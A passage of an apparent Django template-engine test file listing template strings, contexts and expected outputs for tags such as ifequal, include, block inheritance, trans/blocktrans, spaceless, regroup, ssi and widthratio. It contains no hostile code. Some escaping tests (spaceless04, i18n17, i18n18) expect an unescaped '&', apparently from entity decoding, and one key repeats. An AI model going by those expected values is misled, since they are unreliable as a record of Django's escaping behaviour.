'ifequal-split03': ('{% ifequal a "test man" %}yes{% else %}no{% endifequal %}', {'a': 'test man'}, "yes"),
'ifequal-split04': ("{% ifequal a 'test man' %}yes{% else %}no{% endifequal %}", {'a': 'test man'}, "yes"),
'ifequal-split05': ("{% ifequal a 'i \"love\" you' %}yes{% else %}no{% endifequal %}", {'a': ''}, "no"),
'ifequal-split06': ("{% ifequal a 'i \"love\" you' %}yes{% else %}no{% endifequal %}", {'a': 'i "love" you'}, "yes"),
'ifequal-split07': ("{% ifequal a 'i \"love\" you' %}yes{% else %}no{% endifequal %}", {'a': 'i love you'}, "no"),
'ifequal-split08': (r"{% ifequal a 'I\'m happy' %}yes{% else %}no{% endifequal %}", {'a': "I'm happy"}, "yes"),
'ifequal-split09': (r"{% ifequal a 'slash\man' %}yes{% else %}no{% endifequal %}", {'a': r"slash\man"}, "yes"),
'ifequal-split10': (r"{% ifequal a 'slash\man' %}yes{% else %}no{% endifequal %}", {'a': r"slashman"}, "no"),
# NUMERIC RESOLUTION
'ifequal-numeric01': ('{% ifequal x 5 %}yes{% endifequal %}', {'x': '5'}, ''),
'ifequal-numeric02': ('{% ifequal x 5 %}yes{% endifequal %}', {'x': 5}, 'yes'),
'ifequal-numeric03': ('{% ifequal x 5.2 %}yes{% endifequal %}', {'x': 5}, ''),
'ifequal-numeric04': ('{% ifequal x 5.2 %}yes{% endifequal %}', {'x': 5.2}, 'yes'),
'ifequal-numeric05': ('{% ifequal x 0.2 %}yes{% endifequal %}', {'x': .2}, 'yes'),
'ifequal-numeric06': ('{% ifequal x .2 %}yes{% endifequal %}', {'x': .2}, 'yes'),
'ifequal-numeric07': ('{% ifequal x 2. %}yes{% endifequal %}', {'x': 2}, ''),
'ifequal-numeric08': ('{% ifequal x "5" %}yes{% endifequal %}', {'x': 5}, ''),
'ifequal-numeric09': ('{% ifequal x "5" %}yes{% endifequal %}', {'x': '5'}, 'yes'),
'ifequal-numeric10': ('{% ifequal x -5 %}yes{% endifequal %}', {'x': -5}, 'yes'),
'ifequal-numeric11': ('{% ifequal x -5.2 %}yes{% endifequal %}', {'x': -5.2}, 'yes'),
'ifequal-numeric12': ('{% ifequal x +5 %}yes{% endifequal %}', {'x': 5}, 'yes'),
# FILTER EXPRESSIONS AS ARGUMENTS
'ifequal-filter01': ('{% ifequal a|upper "A" %}x{% endifequal %}', {'a': 'a'}, 'x'),
'ifequal-filter02': ('{% ifequal "A" a|upper %}x{% endifequal %}', {'a': 'a'}, 'x'),
'ifequal-filter03': ('{% ifequal a|upper b|upper %}x{% endifequal %}', {'a': 'x', 'b': 'X'}, 'x'),
'ifequal-filter04': ('{% ifequal x|slice:"1" "a" %}x{% endifequal %}', {'x': 'aaa'}, 'x'),
'ifequal-filter05': ('{% ifequal x|slice:"1"|upper "A" %}x{% endifequal %}', {'x': 'aaa'}, 'x'),
### IFNOTEQUAL TAG ########################################################
'ifnotequal01': ("{% ifnotequal a b %}yes{% endifnotequal %}", {"a": 1, "b": 2}, "yes"),
'ifnotequal02': ("{% ifnotequal a b %}yes{% endifnotequal %}", {"a": 1, "b": 1}, ""),
'ifnotequal03': ("{% ifnotequal a b %}yes{% else %}no{% endifnotequal %}", {"a": 1, "b": 2}, "yes"),
'ifnotequal04': ("{% ifnotequal a b %}yes{% else %}no{% endifnotequal %}", {"a": 1, "b": 1}, "no"),
## INCLUDE TAG ###########################################################
'include01': ('{% include "basic-syntax01" %}', {}, "something cool"),
'include02': ('{% include "basic-syntax02" %}', {'headline': 'Included'}, "Included"),
'include03': ('{% include template_name %}', {'template_name': 'basic-syntax02', 'headline': 'Included'}, "Included"),
'include04': ('a{% include "nonexistent" %}b', {}, ("ab", "ab", template.TemplateDoesNotExist)),
'include 05': ('template with a space', {}, 'template with a space'),
'include06': ('{% include "include 05"%}', {}, 'template with a space'),
# extra inline context
'include07': ('{% include "basic-syntax02" with headline="Inline" %}', {'headline': 'Included'}, 'Inline'),
'include08': ('{% include headline with headline="Dynamic" %}', {'headline': 'basic-syntax02'}, 'Dynamic'),
'include09': ('{{ first }}--{% include "basic-syntax03" with first=second|lower|upper second=first|upper %}--{{ second }}', {'first': 'Ul', 'second': 'lU'}, 'Ul--LU --- UL--lU'),
# isolated context
'include10': ('{% include "basic-syntax03" only %}', {'first': '1'}, (' --- ', 'INVALID --- INVALID')),
'include11': ('{% include "basic-syntax03" only with second=2 %}', {'first': '1'}, (' --- 2', 'INVALID --- 2')),
'include12': ('{% include "basic-syntax03" with first=1 only %}', {'second': '2'}, ('1 --- ', '1 --- INVALID')),
# autoescape context
'include13': ('{% autoescape off %}{% include "basic-syntax03" %}{% endautoescape %}', {'first': '&'}, ('& --- ', '& --- INVALID')),
'include14': ('{% autoescape off %}{% include "basic-syntax03" with first=var1 only %}{% endautoescape %}', {'var1': '&'}, ('& --- ', '& --- INVALID')),
'include-error01': ('{% include "basic-syntax01" with %}', {}, template.TemplateSyntaxError),
'include-error02': ('{% include "basic-syntax01" with "no key" %}', {}, template.TemplateSyntaxError),
'include-error03': ('{% include "basic-syntax01" with dotted.arg="error" %}', {}, template.TemplateSyntaxError),
'include-error04': ('{% include "basic-syntax01" something_random %}', {}, template.TemplateSyntaxError),
'include-error05': ('{% include "basic-syntax01" foo="duplicate" foo="key" %}', {}, template.TemplateSyntaxError),
'include-error06': ('{% include "basic-syntax01" only only %}', {}, template.TemplateSyntaxError),
### INCLUSION ERROR REPORTING #############################################
'include-fail1': ('{% load bad_tag %}{% badtag %}', {}, RuntimeError),
'include-fail2': ('{% load broken_tag %}', {}, template.TemplateSyntaxError),
'include-error07': ('{% include "include-fail1" %}', {}, ('', '', RuntimeError)),
'include-error08': ('{% include "include-fail2" %}', {}, ('', '', template.TemplateSyntaxError)),
'include-error09': ('{% include failed_include %}', {'failed_include': 'include-fail1'}, ('', '', RuntimeError)),
'include-error10': ('{% include failed_include %}', {'failed_include': 'include-fail2'}, ('', '', template.TemplateSyntaxError)),
### NAMED ENDBLOCKS #######################################################
# Basic test
'namedendblocks01': ("1{% block first %}_{% block second %}2{% endblock second %}_{% endblock first %}3", {}, '1_2_3'),
# Unbalanced blocks
'namedendblocks02': ("1{% block first %}_{% block second %}2{% endblock first %}_{% endblock second %}3", {}, template.TemplateSyntaxError),
'namedendblocks03': ("1{% block first %}_{% block second %}2{% endblock %}_{% endblock second %}3", {}, template.TemplateSyntaxError),
'namedendblocks04': ("1{% block first %}_{% block second %}2{% endblock second %}_{% endblock third %}3", {}, template.TemplateSyntaxError),
'namedendblocks05': ("1{% block first %}_{% block second %}2{% endblock first %}", {}, template.TemplateSyntaxError),
# Mixed named and unnamed endblocks
'namedendblocks06': ("1{% block first %}_{% block second %}2{% endblock %}_{% endblock first %}3", {}, '1_2_3'),
'namedendblocks07': ("1{% block first %}_{% block second %}2{% endblock second %}_{% endblock %}3", {}, '1_2_3'),
### INHERITANCE ###########################################################
# Standard template with no inheritance
'inheritance01': ("1{% block first %}&{% endblock %}3{% block second %}_{% endblock %}", {}, '1&3_'),
# Standard two-level inheritance
'inheritance02': ("{% extends 'inheritance01' %}{% block first %}2{% endblock %}{% block second %}4{% endblock %}", {}, '1234'),
# Three-level with no redefinitions on third level
'inheritance03': ("{% extends 'inheritance02' %}", {}, '1234'),
# Two-level with no redefinitions on second level
'inheritance04': ("{% extends 'inheritance01' %}", {}, '1&3_'),
# Two-level with double quotes instead of single quotes
'inheritance05': ('{% extends "inheritance02" %}', {}, '1234'),
# Three-level with variable parent-template name
'inheritance06': ("{% extends foo %}", {'foo': 'inheritance02'}, '1234'),
# Two-level with one block defined, one block not defined
'inheritance07': ("{% extends 'inheritance01' %}{% block second %}5{% endblock %}", {}, '1&35'),
# Three-level with one block defined on this level, two blocks defined next level
'inheritance08': ("{% extends 'inheritance02' %}{% block second %}5{% endblock %}", {}, '1235'),
# Three-level with second and third levels blank
'inheritance09': ("{% extends 'inheritance04' %}", {}, '1&3_'),
# Three-level with space NOT in a block -- should be ignored
'inheritance10': ("{% extends 'inheritance04' %} ", {}, '1&3_'),
# Three-level with both blocks defined on this level, but none on second level
'inheritance11': ("{% extends 'inheritance04' %}{% block first %}2{% endblock %}{% block second %}4{% endblock %}", {}, '1234'),
# Three-level with this level providing one and second level providing the other
'inheritance12': ("{% extends 'inheritance07' %}{% block first %}2{% endblock %}", {}, '1235'),
# Three-level with this level overriding second level
'inheritance13': ("{% extends 'inheritance02' %}{% block first %}a{% endblock %}{% block second %}b{% endblock %}", {}, '1a3b'),
# A block defined only in a child template shouldn't be displayed
'inheritance14': ("{% extends 'inheritance01' %}{% block newblock %}NO DISPLAY{% endblock %}", {}, '1&3_'),
# A block within another block
'inheritance15': ("{% extends 'inheritance01' %}{% block first %}2{% block inner %}inner{% endblock %}{% endblock %}", {}, '12inner3_'),
# A block within another block (level 2)
'inheritance16': ("{% extends 'inheritance15' %}{% block inner %}out{% endblock %}", {}, '12out3_'),
# {% load %} tag (parent -- setup for exception04)
'inheritance17': ("{% load testtags %}{% block first %}1234{% endblock %}", {}, '1234'),
# {% load %} tag (standard usage, without inheritance)
'inheritance18': ("{% load testtags %}{% echo this that theother %}5678", {}, 'this that theother5678'),
# {% load %} tag (within a child template)
'inheritance19': ("{% extends 'inheritance01' %}{% block first %}{% load testtags %}{% echo 400 %}5678{% endblock %}", {}, '140056783_'),
# Two-level inheritance with {{ block.super }}
'inheritance20': ("{% extends 'inheritance01' %}{% block first %}{{ block.super }}a{% endblock %}", {}, '1&a3_'),
# Three-level inheritance with {{ block.super }} from parent
'inheritance21': ("{% extends 'inheritance02' %}{% block first %}{{ block.super }}a{% endblock %}", {}, '12a34'),
# Three-level inheritance with {{ block.super }} from grandparent
'inheritance22': ("{% extends 'inheritance04' %}{% block first %}{{ block.super }}a{% endblock %}", {}, '1&a3_'),
# Three-level inheritance with {{ block.super }} from parent and grandparent
'inheritance23': ("{% extends 'inheritance20' %}{% block first %}{{ block.super }}b{% endblock %}", {}, '1&ab3_'),
# Inheritance from local context without use of template loader
'inheritance24': ("{% extends context_template %}{% block first %}2{% endblock %}{% block second %}4{% endblock %}", {'context_template': template.Template("1{% block first %}_{% endblock %}3{% block second %}_{% endblock %}")}, '1234'),
# Inheritance from local context with variable parent template
'inheritance25': ("{% extends context_template.1 %}{% block first %}2{% endblock %}{% block second %}4{% endblock %}", {'context_template': [template.Template("Wrong"), template.Template("1{% block first %}_{% endblock %}3{% block second %}_{% endblock %}")]}, '1234'),
# Set up a base template to extend
'inheritance26': ("no tags", {}, 'no tags'),
# Inheritance from a template that doesn't have any blocks
'inheritance27': ("{% extends 'inheritance26' %}", {}, 'no tags'),
# Set up a base template with a space in it.
'inheritance 28': ("{% block first %}!{% endblock %}", {}, '!'),
# Inheritance from a template with a space in its name should work.
'inheritance29': ("{% extends 'inheritance 28' %}", {}, '!'),
# Base template, putting block in a conditional {% if %} tag
'inheritance30': ("1{% if optional %}{% block opt %}2{% endblock %}{% endif %}3", {'optional': True}, '123'),
# Inherit from a template with block wrapped in an {% if %} tag (in parent), still gets overridden
'inheritance31': ("{% extends 'inheritance30' %}{% block opt %}two{% endblock %}", {'optional': True}, '1two3'),
'inheritance32': ("{% extends 'inheritance30' %}{% block opt %}two{% endblock %}", {}, '13'),
# Base template, putting block in a conditional {% ifequal %} tag
'inheritance33': ("1{% ifequal optional 1 %}{% block opt %}2{% endblock %}{% endifequal %}3", {'optional': 1}, '123'),
# Inherit from a template with block wrapped in an {% ifequal %} tag (in parent), still gets overridden
'inheritance34': ("{% extends 'inheritance33' %}{% block opt %}two{% endblock %}", {'optional': 1}, '1two3'),
'inheritance35': ("{% extends 'inheritance33' %}{% block opt %}two{% endblock %}", {'optional': 2}, '13'),
# Base template, putting block in a {% for %} tag
'inheritance36': ("{% for n in numbers %}_{% block opt %}{{ n }}{% endblock %}{% endfor %}_", {'numbers': '123'}, '_1_2_3_'),
# Inherit from a template with block wrapped in an {% for %} tag (in parent), still gets overridden
'inheritance37': ("{% extends 'inheritance36' %}{% block opt %}X{% endblock %}", {'numbers': '123'}, '_X_X_X_'),
'inheritance38': ("{% extends 'inheritance36' %}{% block opt %}X{% endblock %}", {}, '_'),
# The super block will still be found.
'inheritance39': ("{% extends 'inheritance30' %}{% block opt %}new{{ block.super }}{% endblock %}", {'optional': True}, '1new23'),
'inheritance40': ("{% extends 'inheritance33' %}{% block opt %}new{{ block.super }}{% endblock %}", {'optional': 1}, '1new23'),
'inheritance41': ("{% extends 'inheritance36' %}{% block opt %}new{{ block.super }}{% endblock %}", {'numbers': '123'}, '_new1_new2_new3_'),
# Expression starting and ending with a quote
'inheritance42': ("{% extends 'inheritance02'|cut:' ' %}", {}, '1234'),
### LOADING TAG LIBRARIES #################################################
'load01': ("{% load testtags subpackage.echo %}{% echo test %} {% echo2 \"test\" %}", {}, "test test"),
'load02': ("{% load subpackage.echo %}{% echo2 \"test\" %}", {}, "test"),
# {% load %} tag, importing individual tags
'load03': ("{% load echo from testtags %}{% echo this that theother %}", {}, 'this that theother'),
'load04': ("{% load echo other_echo from testtags %}{% echo this that theother %} {% other_echo and another thing %}", {}, 'this that theother and another thing'),
'load05': ("{% load echo upper from testtags %}{% echo this that theother %} {{ statement|upper }}", {'statement': 'not shouting'}, 'this that theother NOT SHOUTING'),
'load06': ("{% load echo2 from subpackage.echo %}{% echo2 \"test\" %}", {}, "test"),
# {% load %} tag errors
'load07': ("{% load echo other_echo bad_tag from testtags %}", {}, template.TemplateSyntaxError),
'load08': ("{% load echo other_echo bad_tag from %}", {}, template.TemplateSyntaxError),
'load09': ("{% load from testtags %}", {}, template.TemplateSyntaxError),
'load10': ("{% load echo from bad_library %}", {}, template.TemplateSyntaxError),
'load11': ("{% load subpackage.echo_invalid %}", {}, template.TemplateSyntaxError),
'load12': ("{% load subpackage.missing %}", {}, template.TemplateSyntaxError),
### I18N ##################################################################
# {% spaceless %} tag
'spaceless01': ("{% spaceless %} <b> <i> text </i> </b> {% endspaceless %}", {}, "<b><i> text </i></b>"),
'spaceless02': ("{% spaceless %} <b> \n <i> text </i> \n </b> {% endspaceless %}", {}, "<b><i> text </i></b>"),
'spaceless03': ("{% spaceless %}<b><i>text</i></b>{% endspaceless %}", {}, "<b><i>text</i></b>"),
'spaceless04': ("{% spaceless %}<b> <i>{{ text }}</i> </b>{% endspaceless %}", {'text' : 'This & that'}, "<b><i>This & that</i></b>"),
'spaceless05': ("{% autoescape off %}{% spaceless %}<b> <i>{{ text }}</i> </b>{% endspaceless %}{% endautoescape %}", {'text' : 'This & that'}, "<b><i>This & that</i></b>"),
'spaceless06': ("{% spaceless %}<b> <i>{{ text|safe }}</i> </b>{% endspaceless %}", {'text' : 'This & that'}, "<b><i>This & that</i></b>"),
# simple translation of a string delimited by '
'i18n01': ("{% load i18n %}{% trans 'xxxyyyxxx' %}", {}, "xxxyyyxxx"),
# simple translation of a string delimited by "
'i18n02': ('{% load i18n %}{% trans "xxxyyyxxx" %}', {}, "xxxyyyxxx"),
# simple translation of a variable
'i18n03': ('{% load i18n %}{% blocktrans %}{{ anton }}{% endblocktrans %}', {'anton': b'\xc3\x85'}, "Å"),
# simple translation of a variable and filter
'i18n04': ('{% load i18n %}{% blocktrans with berta=anton|lower %}{{ berta }}{% endblocktrans %}', {'anton': b'\xc3\x85'}, 'å'),
'legacyi18n04': ('{% load i18n %}{% blocktrans with anton|lower as berta %}{{ berta }}{% endblocktrans %}', {'anton': b'\xc3\x85'}, 'å'),
# simple translation of a string with interpolation
'i18n05': ('{% load i18n %}{% blocktrans %}xxx{{ anton }}xxx{% endblocktrans %}', {'anton': 'yyy'}, "xxxyyyxxx"),
# simple translation of a string to german
'i18n06': ('{% load i18n %}{% trans "Page not found" %}', {'LANGUAGE_CODE': 'de'}, "Seite nicht gefunden"),
# translation of singular form
'i18n07': ('{% load i18n %}{% blocktrans count counter=number %}singular{% plural %}{{ counter }} plural{% endblocktrans %}', {'number': 1}, "singular"),
'legacyi18n07': ('{% load i18n %}{% blocktrans count number as counter %}singular{% plural %}{{ counter }} plural{% endblocktrans %}', {'number': 1}, "singular"),
# translation of plural form
'i18n08': ('{% load i18n %}{% blocktrans count number as counter %}singular{% plural %}{{ counter }} plural{% endblocktrans %}', {'number': 2}, "2 plural"),
'legacyi18n08': ('{% load i18n %}{% blocktrans count counter=number %}singular{% plural %}{{ counter }} plural{% endblocktrans %}', {'number': 2}, "2 plural"),
# simple non-translation (only marking) of a string to german
'i18n09': ('{% load i18n %}{% trans "Page not found" noop %}', {'LANGUAGE_CODE': 'de'}, "Page not found"),
# translation of a variable with a translated filter
'i18n10': ('{{ bool|yesno:_("yes,no,maybe") }}', {'bool': True, 'LANGUAGE_CODE': 'de'}, 'Ja'),
# translation of a variable with a non-translated filter
'i18n11': ('{{ bool|yesno:"ja,nein" }}', {'bool': True}, 'ja'),
# usage of the get_available_languages tag
'i18n12': ('{% load i18n %}{% get_available_languages as langs %}{% for lang in langs %}{% ifequal lang.0 "de" %}{{ lang.0 }}{% endifequal %}{% endfor %}', {}, 'de'),
# translation of constant strings
'i18n13': ('{{ _("Password") }}', {'LANGUAGE_CODE': 'de'}, 'Passwort'),
'i18n14': ('{% cycle "foo" _("Password") _(\'Password\') as c %} {% cycle c %} {% cycle c %}', {'LANGUAGE_CODE': 'de'}, 'foo Passwort Passwort'),
'i18n15': ('{{ absent|default:_("Password") }}', {'LANGUAGE_CODE': 'de', 'absent': ""}, 'Passwort'),
'i18n16': ('{{ _("<") }}', {'LANGUAGE_CODE': 'de'}, '<'),
# Escaping inside blocktrans and trans works as if it was directly in the
# template.
'i18n17': ('{% load i18n %}{% blocktrans with berta=anton|escape %}{{ berta }}{% endblocktrans %}', {'anton': 'α & β'}, 'α & β'),
'i18n18': ('{% load i18n %}{% blocktrans with berta=anton|force_escape %}{{ berta }}{% endblocktrans %}', {'anton': 'α & β'}, 'α & β'),
'i18n19': ('{% load i18n %}{% blocktrans %}{{ andrew }}{% endblocktrans %}', {'andrew': 'a & b'}, 'a & b'),
'i18n20': ('{% load i18n %}{% trans andrew %}', {'andrew': 'a & b'}, 'a & b'),
'i18n21': ('{% load i18n %}{% blocktrans %}{{ andrew }}{% endblocktrans %}', {'andrew': mark_safe('a & b')}, 'a & b'),
'i18n22': ('{% load i18n %}{% trans andrew %}', {'andrew': mark_safe('a & b')}, 'a & b'),
'legacyi18n17': ('{% load i18n %}{% blocktrans with anton|escape as berta %}{{ berta }}{% endblocktrans %}', {'anton': 'α & β'}, 'α & β'),
'legacyi18n18': ('{% load i18n %}{% blocktrans with anton|force_escape as berta %}{{ berta }}{% endblocktrans %}', {'anton': 'α & β'}, 'α & β'),
# Use filters with the {% trans %} tag, #5972
'i18n23': ('{% load i18n %}{% trans "Page not found"|capfirst|slice:"6:" %}', {'LANGUAGE_CODE': 'de'}, 'nicht gefunden'),
'i18n24': ("{% load i18n %}{% trans 'Page not found'|upper %}", {'LANGUAGE_CODE': 'de'}, 'SEITE NICHT GEFUNDEN'),
'i18n25': ('{% load i18n %}{% trans somevar|upper %}', {'somevar': 'Page not found', 'LANGUAGE_CODE': 'de'}, 'SEITE NICHT GEFUNDEN'),
# translation of plural form with extra field in singular form (#13568)
'i18n26': ('{% load i18n %}{% blocktrans with extra_field=myextra_field count counter=number %}singular {{ extra_field }}{% plural %}plural{% endblocktrans %}', {'number': 1, 'myextra_field': 'test'}, "singular test"),
'legacyi18n26': ('{% load i18n %}{% blocktrans with myextra_field as extra_field count number as counter %}singular {{ extra_field }}{% plural %}plural{% endblocktrans %}', {'number': 1, 'myextra_field': 'test'}, "singular test"),
# translation of singular form in russian (#14126)
'i18n27': ('{% load i18n %}{% blocktrans count counter=number %}{{ counter }} result{% plural %}{{ counter }} results{% endblocktrans %}', {'number': 1, 'LANGUAGE_CODE': 'ru'}, '1 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442'),
'legacyi18n27': ('{% load i18n %}{% blocktrans count number as counter %}{{ counter }} result{% plural %}{{ counter }} results{% endblocktrans %}', {'number': 1, 'LANGUAGE_CODE': 'ru'}, '1 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442'),
# simple translation of multiple variables
'i18n28': ('{% load i18n %}{% blocktrans with a=anton b=berta %}{{ a }} + {{ b }}{% endblocktrans %}', {'anton': 'α', 'berta': 'β'}, 'α + β'),
'legacyi18n28': ('{% load i18n %}{% blocktrans with anton as a and berta as b %}{{ a }} + {{ b }}{% endblocktrans %}', {'anton': 'α', 'berta': 'β'}, 'α + β'),
# retrieving language information
'i18n28_2': ('{% load i18n %}{% get_language_info for "de" as l %}{{ l.code }}: {{ l.name }}/{{ l.name_local }} bidi={{ l.bidi }}', {}, 'de: German/Deutsch bidi=False'),
'i18n29': ('{% load i18n %}{% get_language_info for LANGUAGE_CODE as l %}{{ l.code }}: {{ l.name }}/{{ l.name_local }} bidi={{ l.bidi }}', {'LANGUAGE_CODE': 'fi'}, 'fi: Finnish/suomi bidi=False'),
'i18n30': ('{% load i18n %}{% get_language_info_list for langcodes as langs %}{% for l in langs %}{{ l.code }}: {{ l.name }}/{{ l.name_local }} bidi={{ l.bidi }}; {% endfor %}', {'langcodes': ['it', 'no']}, 'it: Italian/italiano bidi=False; no: Norwegian/Norsk bidi=False; '),
'i18n31': ('{% load i18n %}{% get_language_info_list for langcodes as langs %}{% for l in langs %}{{ l.code }}: {{ l.name }}/{{ l.name_local }} bidi={{ l.bidi }}; {% endfor %}', {'langcodes': (('sl', 'Slovenian'), ('fa', 'Persian'))}, 'sl: Slovenian/Sloven\u0161\u010dina bidi=False; fa: Persian/\u0641\u0627\u0631\u0633\u06cc bidi=True; '),
'i18n32': ('{% load i18n %}{{ "hu"|language_name }} {{ "hu"|language_name_local }} {{ "hu"|language_bidi }}', {}, 'Hungarian Magyar False'),
'i18n33': ('{% load i18n %}{{ langcode|language_name }} {{ langcode|language_name_local }} {{ langcode|language_bidi }}', {'langcode': 'nl'}, 'Dutch Nederlands False'),
# blocktrans handling of variables which are not in the context.
'i18n34': ('{% load i18n %}{% blocktrans %}{{ missing }}{% endblocktrans %}', {}, ''),
# trans tag with as var
'i18n35': ('{% load i18n %}{% trans "Page not found" as page_not_found %}{{ page_not_found }}', {'LANGUAGE_CODE': 'de'}, "Seite nicht gefunden"),
'i18n36': ('{% load i18n %}{% trans "Page not found" noop as page_not_found %}{{ page_not_found }}', {'LANGUAGE_CODE': 'de'}, "Page not found"),
'i18n36': ('{% load i18n %}{% trans "Page not found" as page_not_found noop %}{{ page_not_found }}', {'LANGUAGE_CODE': 'de'}, "Page not found"),
'i18n37': ('{% load i18n %}{% trans "Page not found" as page_not_found %}{% blocktrans %}Error: {{ page_not_found }}{% endblocktrans %}', {'LANGUAGE_CODE': 'de'}, "Error: Seite nicht gefunden"),
### HANDLING OF TEMPLATE_STRING_IF_INVALID ###################################
'invalidstr01': ('{{ var|default:"Foo" }}', {}, ('Foo','INVALID')),
'invalidstr02': ('{{ var|default_if_none:"Foo" }}', {}, ('','INVALID')),
'invalidstr03': ('{% for v in var %}({{ v }}){% endfor %}', {}, ''),
'invalidstr04': ('{% if var %}Yes{% else %}No{% endif %}', {}, 'No'),
'invalidstr04_2': ('{% if var|default:"Foo" %}Yes{% else %}No{% endif %}', {}, 'Yes'),
'invalidstr05': ('{{ var }}', {}, ('', ('INVALID %s', 'var'))),
'invalidstr06': ('{{ var.prop }}', {'var': {}}, ('', ('INVALID %s', 'var.prop'))),
### MULTILINE #############################################################
'multiline01': ("""
Hello,
boys.
How
are
you
gentlemen.
""",
{},
"""
Hello,
boys.
How
are
you
gentlemen.
"""),
### REGROUP TAG ###########################################################
'regroup01': ('{% regroup data by bar as grouped %}'
'{% for group in grouped %}'
'{{ group.grouper }}:'
'{% for item in group.list %}'
'{{ item.foo }}'
'{% endfor %},'
'{% endfor %}',
{'data': [ {'foo':'c', 'bar':1},
{'foo':'d', 'bar':1},
{'foo':'a', 'bar':2},
{'foo':'b', 'bar':2},
{'foo':'x', 'bar':3} ]},
'1:cd,2:ab,3:x,'),
# Test for silent failure when target variable isn't found
'regroup02': ('{% regroup data by bar as grouped %}'
'{% for group in grouped %}'
'{{ group.grouper }}:'
'{% for item in group.list %}'
'{{ item.foo }}'
'{% endfor %},'
'{% endfor %}',
{}, ''),
# Regression tests for #17675
# The date template filter has expects_localtime = True
'regroup03': ('{% regroup data by at|date:"m" as grouped %}'
'{% for group in grouped %}'
'{{ group.grouper }}:'
'{% for item in group.list %}'
'{{ item.at|date:"d" }}'
'{% endfor %},'
'{% endfor %}',
{'data': [{'at': date(2012, 2, 14)},
{'at': date(2012, 2, 28)},
{'at': date(2012, 7, 4)}]},
'02:1428,07:04,'),
# The join template filter has needs_autoescape = True
'regroup04': ('{% regroup data by bar|join:"" as grouped %}'
'{% for group in grouped %}'
'{{ group.grouper }}:'
'{% for item in group.list %}'
'{{ item.foo|first }}'
'{% endfor %},'
'{% endfor %}',
{'data': [{'foo': 'x', 'bar': ['ab', 'c']},
{'foo': 'y', 'bar': ['a', 'bc']},
{'foo': 'z', 'bar': ['a', 'd']}]},
'abc:xy,ad:z,'),
### SSI TAG ########################################################
# Test normal behavior
'ssi01': ('{%% ssi "%s" %%}' % os.path.join(basedir, 'templates', 'ssi_include.html'), {}, 'This is for testing an ssi include. {{ test }}\n'),
'ssi02': ('{%% ssi "%s" %%}' % os.path.join(basedir, 'not_here'), {}, ''),
'ssi03': ("{%% ssi '%s' %%}" % os.path.join(basedir, 'not_here'), {}, ''),
# Test passing as a variable
'ssi04': ('{% load ssi from future %}{% ssi ssi_file %}', {'ssi_file': os.path.join(basedir, 'templates', 'ssi_include.html')}, 'This is for testing an ssi include. {{ test }}\n'),
'ssi05': ('{% load ssi from future %}{% ssi ssi_file %}', {'ssi_file': 'no_file'}, ''),
# Test parsed output
'ssi06': ('{%% ssi "%s" parsed %%}' % os.path.join(basedir, 'templates', 'ssi_include.html'), {'test': 'Look ma! It parsed!'}, 'This is for testing an ssi include. Look ma! It parsed!\n'),
'ssi07': ('{%% ssi "%s" parsed %%}' % os.path.join(basedir, 'not_here'), {'test': 'Look ma! It parsed!'}, ''),
# Test space in file name
'ssi08': ('{%% ssi "%s" %%}' % os.path.join(basedir, 'templates', 'ssi include with spaces.html'), {}, 'This is for testing an ssi include with spaces in its name. {{ test }}\n'),
'ssi09': ('{%% ssi "%s" parsed %%}' % os.path.join(basedir, 'templates', 'ssi include with spaces.html'), {'test': 'Look ma! It parsed!'}, 'This is for testing an ssi include with spaces in its name. Look ma! It parsed!\n'),
### TEMPLATETAG TAG #######################################################
'templatetag01': ('{% templatetag openblock %}', {}, '{%'),
'templatetag02': ('{% templatetag closeblock %}', {}, '%}'),
'templatetag03': ('{% templatetag openvariable %}', {}, '{{'),
'templatetag04': ('{% templatetag closevariable %}', {}, '}}'),
'templatetag05': ('{% templatetag %}', {}, template.TemplateSyntaxError),
'templatetag06': ('{% templatetag foo %}', {}, template.TemplateSyntaxError),
'templatetag07': ('{% templatetag openbrace %}', {}, '{'),
'templatetag08': ('{% templatetag closebrace %}', {}, '}'),
'templatetag09': ('{% templatetag openbrace %}{% templatetag openbrace %}', {}, '{{'),
'templatetag10': ('{% templatetag closebrace %}{% templatetag closebrace %}', {}, '}}'),
'templatetag11': ('{% templatetag opencomment %}', {}, '{#'),
'templatetag12': ('{% templatetag closecomment %}', {}, '#}'),
# Simple tags with customized names
'simpletag-renamed01': ('{% load custom %}{% minusone 7 %}', {}, '6'),
'simpletag-renamed02': ('{% load custom %}{% minustwo 7 %}', {}, '5'),
'simpletag-renamed03': ('{% load custom %}{% minustwo_overridden_name 7 %}', {}, template.TemplateSyntaxError),
### WIDTHRATIO TAG ########################################################
'widthratio01': ('{% widthratio a b 0 %}', {'a':50,'b':100}, '0'),
'widthratio02': ('{% widthratio a b 100 %}', {'a':0,'b':0}, '0'),
'widthratio03': ('{% widthratio a b 100 %}', {'a':0,'b':100}, '0'),
'widthratio04': ('{% widthratio a b 100 %}', {'a':50,'b':100}, '50'),
'widthratio05': ('{% widthratio a b 100 %}', {'a':100,'b':100}, '100'),
# 62.5 should round to 63
'widthratio06': ('{% widthratio a b 100 %}', {'a':50,'b':80}, '63'),
# 71.4 should round to 71
'widthratio07': ('{% widthratio a b 100 %}', {'a':50,'b':70}, '71'),
# Raise exception if we don't have 3 args, last one an integer
'widthratio08': ('{% widthratio %}', {}, template.TemplateSyntaxError),
'widthratio09': ('{% widthratio a b %}', {'a':50,'b':100}, template.TemplateSyntaxError),
'widthratio10': ('{% widthratio a b 100.0 %}', {'a':50,'b':100}, '50'),
# #10043: widthratio should allow max_width to be a variable
'widthratio11': ('{% widthratio a b c %}', {'a':50,'b':100, 'c': 100}, '50'),
### WITH TAG ########################################################
'with01': ('{% with key=dict.key %}{{ key }}{% endwith %}', {'dict': {'key': 50}}, '50'),
'legacywith01': ('{% with dict.key as key %}{{ key }}{% endwith %}', {'dict': {'key': 50}}, '50'),
'with02': ('{{ key }}{% with key=dict.key %}{{ key }}-{{ dict.key }}-{{ key }}{% endwith %}{{ key }}', {'dict': {'key': 50}}, ('50-50-50', 'INVALID50-50-50INVALID')),
'legacywith02': ('{{ key }}{% with dict.key as key %}{{ key }}-{{ dict.key }}-{{ key }}{% endwith %}{{ key }}', {'dict': {'key': 50}}, ('50-50-50', 'INVALID50-50-50INVALID')),
'with03': ('{% with a=alpha b=beta %}{{ a }}{{ b }}{% endwith %}', {'alpha': 'A', 'beta': 'B'}, 'AB'),
'with-error01': ('{% with dict.key xx key %}{{ key }}{% endwith %}', {'dict': {'key': 50}}, template.TemplateSyntaxError),
